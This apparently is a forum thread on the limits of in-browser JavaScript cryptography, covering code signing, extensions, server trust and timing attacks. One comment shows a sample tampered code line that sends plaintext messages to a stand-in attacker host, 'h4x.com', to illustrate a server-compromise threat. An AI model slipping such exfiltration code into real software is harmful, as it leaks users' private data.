I think it's obvious to everyone that code coming directly from the server cannot be trusted completely by the end user. The only solution that might work is signed browser extensions. I really would have liked to learn more about the considerations when taking this route.
However, code coming from the server can be verified, so you can know if the crypto.js delivered to you was modified from a known good version. You can audit a particular version and say, "this works correctly", and then look at changes over time.
For instance you can have a greasemonkey script that tells you when the crypto code is different from last time.
The best solution realistically would be SSL plus encrypting data first in the browser (separately encrypt the data and the transmission of it).
If you're going to have a script/extension checking that the code you download is the code you want, then just package everything as an extension and be done with it. If you're signing with your private key and verifying with your public key, you're going to have to keep your private key on separate machines from your app servers (and hopefully on another network entirely), otherwise Hacky McMalware can just publish a version of crypto.js (using your private key) that sends data to a remote server in plaintext. With all this signing going on, you no longer have automatic deployment (you have to re-sign on every change), and the benefits of serving a webapp plus an extension (with the complexity of signing/verifying) start to look similar to just having an extension that packages everything, which you sign on each change anyway.
Best solution is not to try to build any kind of webapp that touches client-side crypto. If you have to, package everything in an extension since you'll need one to distribute your public key anyway.
This post is talking about the W3C WebCrypto API, which exposes native implementations of cryptographic primitives directly to JavaScript in the browser. This mitigates an entire class of attacks that libraries like "crypto.js" can't, such as cache timing attacks. Providing a native JavaScript API for cryptography that is baked into the browser solves a lot of problems around both security and performance. It is also a much better solution than a GreaseMonkey script. The W3C has been doing their homework.
BUT...
That said, this entire post is about why even when the fundamentals of exposing cryptographic primitives into the browser are solved, the browser is still a bad platform for cryptography applications, particularly when the user doesn't want to trust the server.
sorry, this is only somewhat related. but i am really ignorant. this is a genuine question that i have had for quite some time now.
when i download security relevant software, the website usually gives me a hash/signature of the download file, so i can verify afterwards whether the data i downloaded really is the file i want or whether it has been tampered with.
but in case an attacker switches the downloaded file for a malignant one, why should s/he be so stupid and not also switch the hash/signature on the website? i am positive i am missing something, as really smart people [0] are doing this, but i do not get it. thanks in advance.
The signature is generated using public key cryptography [1], meaning that to generate a valid signature, you have to have the private key.
Because the signature only has to be generated when a new version of the file is released, you can use the most bothersome (and effective) manual methods of security, like keeping the private key on an air gapped [2] computer.
So if an attacker manages to switch the downloaded file for a malicious one, they may still not have got access to the private key used for release signing.
Of course, the attacker could still remove all links to the signature file and all mention of it in the public documentation, so downloaders wouldn't know there was a signature to check. So it's better if the site isn't compromised in the first place.
So this will also probably be another seemingly clueless question, but after reading up on air gapped computers, how would that help with the new hash?
You're running into a basic bootstrapping problem: the person providing the file wants you to be able to check that the file is authentic, but you have no cryptographic mechanism to verify that.
What they're assuming is that someone who has compromised the download servers won't also compromise the rest of the web site. That's certainly a possibility though.
An attacker who compromises both could trick you into downloading compromised software, even though you're checking the hashes from the web site. There are also multiple ways they could pull this off.
For what it's worth, much of The Update Framework work which I referenced in the blog post has come out of Thandy, the Tor updater. The model Tor is providing here is often referred to as TOFU, or "Trust On First Use": once you have received a good copy of Thandy, you will continue to receive uncompromised versions of the software.
add: so thanks to bascule and michaelt i now realise that the idea is basically increasing the cost to the attacker. by serving the signature and the file from different servers, the attacker has to compromise both servers. by signing with a private key and publicising the public key, the attacker has to compromise either the private key storage or all the public key storages. thanks a lot.
a huge issue i think in SSL is allowing 3rd party anything to be served from a different domain via https, there should be warnings and automatic blocks about this for the user and i don't know why there aren't.
i wonder if a public, open-source cdn specifically for crypto libs with known sha256 hashes would help, along with a standard way to "require" them in the html standard that differs from how regular scripts can be included/injected now. or even include them in browsers so they're auto-updated by the vendors or some central trusted authority.
That's all fine and well, but there's no standard way to implement encryption using the now-standard crypto libs. In other words an attacker can still change your code from
var ciphertext = StandardCrypto.aes(my_key, my_message);
to
// disable crypto
var ciphertext = my_message;
// or send plaintext to h4x.com
send_jsonp('http://h4x.com/collect?msg='+my_message);
var ciphertext = StandardCrypto.aes(my_key, my_message);
Standard crypto libs won't do you any good if you aren't actually calling them.
sure, if the server is compromised there's really not much that will save anyone. but the user must necessarily trust the server at least with the data they intend to encrypt. for authentication they can trust some third party like oauth or persona/browser-id.
> but the user must necessarily trust the server at least with the data they intend to encrypt
not true. if i distribute an app that encrypts user data (based on a username/password-derived key), stores it on a server, and lets them access it anywhere (from the app), the server can be stupid as a bag of rocks and know nothing about the data, and more importantly, require absolutely no trust from the client because the client encrypts everything via code it owns. at this point, the user only needs to trust the app and the platform it runs on, because the server has absolutely nothing to do with the encryption.
if the server does nothing but storage, you're right. i was talking more about something like SaaS and encrypting in transport, such as passing CC info or other sensitive data that the server must know to pass through to gov't backends, payment processors or other apis.
you can't say, for example, that Lavabit could still provide a service without knowing the recipient's decrypted email address.
In those scenarios, client side crypto isn't even applicable to begin with. If the service requires trusting the server with sensitive information, then the best we can hope for is to secure the transport of the data, which is done with https. Client side crypto only comes into play with apps where you don't want to trust the server with any sensitive data.
The big problem with most (all?) in-browser cryptography is that you still need to trust the server. If you have to trust the server, what is the value of doing crypto on the client side? You may as well do crypto on the server side and communicate between the server and the client using SSL.
You pretty much have the same issue with any desktop software - you have to trust the authors and the server that gives you the download files (or the server(s) that give you checksums and public keys to verify the download).
Doing in-browser crypto requires less trust than server-side crypto. With in-browser crypto, the server would have to do an active attack and serve malicious scripts, which could be detected. When everything happens in the server all the time, it would be a passive attack that doesn't require any client-side modification and could easily go undetected.
Also, with open-source websites, people could audit the source code and ensure it works as advertised. Combined with a browser extension that verifies the source code from the website matches the code on the public code repository, this could make it much easier to trust websites to do in-browser crypto right.
I have a problem that is best solved by encrypting data in the browser - because the server should not be trusted with seeing the information in the clear.
This is much like the exception the OP mentions at LivingSocial. Can anyone weigh in on whether that's safe?
Safe(r) than just sending it in the clear so the server can read it, probably. However, if your server gets compromised, the JS code doing the crypto can easily be replaced to just return the results in plaintext...in which case you're still doing SSL, so good job, but the CC#s are vulnerable to whoever wishes to sniff them on the server, which is pretty much how most online systems work anyway.
Couldn't hurt to use asymmetric encryption using the provider's public key, but just beware that without packaging/signing the crypto code, it's a tossup whether or not it's actually there.
Edit: if it's absolutely imperative that the server not be able to read the message, then not packaging all the code is unsafe. However, if the server not being able to read the message is nice to have but non-essential, then by all means, run your code in a webapp.
Thanks. I'd use a browser extension, and also constrain what gets sent to the server.
If the server was really compromised, it could just copy the CC# into another field in the form (so it gets sent twice, encrypted and unencrypted) - and the server would get the data without having to change the JS. Integrity checks would not turn anything up. A properly paranoid browser extension should have a specified format for sending a form, so that no extra information is leaked.
In my case it's bids rather than CC#s, though the same pattern holds of encrypting with the tender creator's public key.
If you were to install some packages on a system, would you install unsigned ones that are allowed to modify every other package, altering how other programs work, without confirmation? That's effectively the state of browser security right now.
We must stop living in this fantasy playground where having no real security in the browser is treated as acceptable, because important things like passwords, PINs and credit card numbers pass through it.
An ability to sign (not just hash) and verify JS, CSS and HTML would be a start. Once verified, a security policy* would be applied, further sandboxing an app so it doesn't go to shit with modifications or inappropriate introspection by injected or malicious code (while usually retaining normal things like the browser and plugins). Also reasonable limits to mark objects and parts of the DOM as only available to certain objects, not Orwellian mandates that throw webdev into chaos.
This is something that would take a great deal of coordination with reluctant vendors that see change as cost, but it would be the biggest win for browser security.
* Something a bazillion times easier to use than SELinux.
Sensible post. Yes, doing crypto in the browser is generally harder due to not having direct access to OpenSSL and due to XSS and many other javascript-related vulnerabilities. But if you cover your ass, don't eval code willy-nilly, and package everything into a browser extension (not just your public key or 90% of your JS, but everything) you can mitigate a lot of potential threats. Also, don't try to reinvent SSL. If you do your own crypto in the browser, it should be for peer to peer, not peer to server.
With something like Firefox, you're kind of screwed. For instance, if I open firebug while using my Turtl extension, I can read the contents of memory right there...there's no real separation/sandboxing between extensions. If one extension can read the contents of another, you've got problems. Chrome does this better.
The best way is to package everything into a separate (os-level) app.
>The best way is to package everything into a separate (os-level) app.
I agree with this on the premise of threats like XSS, however there is a human aspect of security which might be overlooked. The problem with apps is that everything that is a website today will become a native app tomorrow. App developers might claim that their app is more secure than using a website to do the same thing, because of the included native crypto implementation. Users might then associate any native app with having greater security than a website accessed through a browser (which may not necessarily be true.) Users might become further desensitized to installing everything from the internet as an app.
Why is this a problem? Websites normally cannot access things like your personal files, without you explicitly choosing a file from your computer using a file dialog, whereas if you run a native app with your user credentials, it is immediately able to access any file that you have permission to access, without necessarily informing you.
Perhaps OS-level security and sandboxing is going to have to improve for this sort of thing to be a good option.
I can see this side of it as well. I tend to come from the camp that if you don't release your code as open-source, you can't really call yourself secure. If you're 100% open-source, distributing a desktop/mobile app will have enough transparency to determine "is it going to steal my CC numbers?"
There's also a barrier to entry to get a user to install anything. Mobile is different, but in the desktop world, if I told my users to download the "CNN desktop app!" they'd roll their eyes, because why would anyone install some trashy malware-ridden program when they can just look at the website, for free, and, as you put it, much more safely? From my perspective, the only reason to distribute a "secure" desktop app version of your webapp is if you don't have a webapp to begin with because it's not secure to do so. So the desktop app would be an open-source complement to the browser extensions your secure app uses.
The products where users seem to preferentially install native apps are services like Dropbox, or video games, where there is value added by not using the "website version." Something that would be very revealing is to investigate how secure these kinds of apps are today. I find it unlikely that in the near future, native app security practices will change very much.
With Bitrated, I'm trying to resolve the main issue he's raising by creating a browser extension that verifies all the content served from the webserver is properly digitally signed and that it matches the source code repository on GitHub.
Anyone interested in working on a man-in-the-middle resistant version of browser/Javascript encryption? I have the basic idea described here: http://www.research.rutgers.edu/~ashwink/ajaxcrypt/index.htm...
I have working code, but it needs some refactoring.
I have this feeling that one day we'll look back in a sort of amused horror that people used to let their browsers run code they downloaded from unknown servers. But I'm not really sure what we'll be doing instead of that.
IMO, this is really important and system application security is not in much better shape than web browser security; you still need to trust a huge number of sources and these sources have known security issues regularly. For that matter, it is probably not that difficult to insert known vulnerable code into some widely used application without it being detected. While there will always need to be some trusted code, it is possible to limit the amount of trusted code and the number of sources that code comes from given better OS security models.
Since hardware and firmware can also be subverted, IMO a new security model should also be able to track and limit what network traffic is intended so that the network traffic actually generated can be (potentially) verified by additional machines on the network and/or by other verifier virtual machines on the same system.
Could Dart or other languages in the browser solve this problem of not being able to do crypto properly in the browser, or is this a more fundamental problem of having crypto inside a browser in the first place?
The fundamental issue is that the code needs to be audited and signed offline so it can't be changed. Unsigned code should not be run. This makes releases harder (no push on commit).
It's not language-specific. App stores already work this way (including the Chrome web store), so a deployment mechanism is there; it's just not used as often as it should be.
It's funny, back in the day we debated ActiveX (code signing) versus sandboxes (Java and JavaScript) and the real answer is that you should have both (as Android does).
But code signing isn't magic either. You still need someone to do the auditing, and users to be careful about what they run. Since users are so trusting, I'm not sure that app stores in practice are any more secure.
Code signing turned out to be very successful for protecting against VBA macro viruses, though I would consider the use of MD5 for doing it flawed nowadays. Office 2007 and later ended up defaulting to a different solution, however, and just days ago I received an email in my inbox with an attachment that claims to have hidden content and asks the user to enable macros. It is not signed, and guess what the macro does?
How does this differ from HTTPS? Since we're dealing with the World Wide Web, it can't be that you would have to install the public key of every site that you visit to get signed versions of the code – it would make browsing infeasible.
It just boils down to the CA based system that is already employed by HTTPS. You must of course trust the other party and their systems, but that's the exact same with code signing. To identify the other party, code signing uses a pre-shared key (e.g. your OS comes pre-installed with their public key). In HTTPS you identify the other party by them possessing the right certificate, that's signed by a trusted intermediary. There's really no better way to do it, bar quantum crypto and HTTPS+DNSSEC, which is sadly not widely supported.
The difference is that if a server running HTTPS is hacked, the attacker can modify the JavaScript at will. With an app that's signed offline, this isn't possible; you could even redistribute it on an untrusted mirror.
Also, in theory, an independent auditor could rebuild the app from source and verify that the bits match, and do an independent audit of the source. So signed apps are more verifiable.
The trusted base for a signed app is (browser + app + app signer), not (browser + app + server), where the server might be a virtual machine in the cloud and you need to trust the virtual machine host provider too.
This doesn't matter most of the time because you have to trust the server anyway, but in the case of someone wanting to encrypt something on the client that cannot be decrypted on the server, it does matter. Encrypting on the client is mostly pointless unless the client code is independent of the server, which requires it to be independently signed.
There is still a cert chain of course, but it's a different one where the developer's private key doesn't get uploaded to the server.
Signed apps are fundamentally not how the web works. The argument here is that the web is basically broken for client-side encryption and the app store model is better for things like secure email or a bitcoin wallet.
But since most app store apps aren't open source and the open source ones aren't independently audited in practice, it's not clear it's a practical difference.
It's a fundamental problem with browser crypto. The attack surface of a crypto routine running in a webpage is really large. There are a lot of places where information could leak in or out, such as timing attacks. If an XSS attack on a webpage succeeds, then a large number of different attack opportunities could exist on browser crypto loaded from that page. Users might also have browser extensions which have the ability to inject into or steal from the web page. The number of things to worry about inside a browser is just way too high to really even consider using it to secure anything. The crypto would have to be built in to the browser at the very least.
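As a small illustration of the timing-leak point above: a naive byte comparison returns as soon as a byte differs, so response time can leak how much of a secret (a MAC tag, a token) matched, while a constant-time version always touches every byte. Sketch only; real code should use a vetted library routine.

```javascript
// Naive comparison: early exit leaks the position of the first mismatch
// through timing.
function naiveEqual(a, b) {
  if (a.length !== b.length) return false;
  for (let i = 0; i < a.length; i++) {
    if (a[i] !== b[i]) return false; // the leak is this early return
  }
  return true;
}

// Constant-time comparison: XOR-accumulate over every byte, decide at
// the end, so timing doesn't depend on where the arrays differ.
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a[i] ^ b[i];
  return diff === 0;
}
```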
I think the OP makes some good points, but I dislike when people are put off of working on their own crypto. Can crypto be difficult to implement? Certainly. Is it impossible? No. The OP makes it sound like properly implementing and authenticating a block cipher is way too difficult for the average programmer, when it is really rather trivial.
For those who can't read sarcasm over the internet, he's kidding. Go ahead, implement ECB mode, what could go wrong, LOL. I've also got a really nice "special" RNG for you too; although it's really slow, it is NSA approved.
If you only need security theater just stick to ROT-13.
As a tiny little sub-area of computational activity, writing crypto is total sorcerer's apprentice territory.
The problem is not that the specific tasks are too heady for most programmers, per se, but that it is easy to introduce a weakness into the system and almost impossible for most programmers to know when they have done so. Implementing an algorithm correctly is one thing; ensuring that your whole system does nothing to undermine the security you hope to get from that algorithm (even through side channels) is a lot iffier.
Remember, people with years of training and experience in the field have had their work defeated time and again. Do you really feel certain Joe Coder will make fewer mistakes than they did?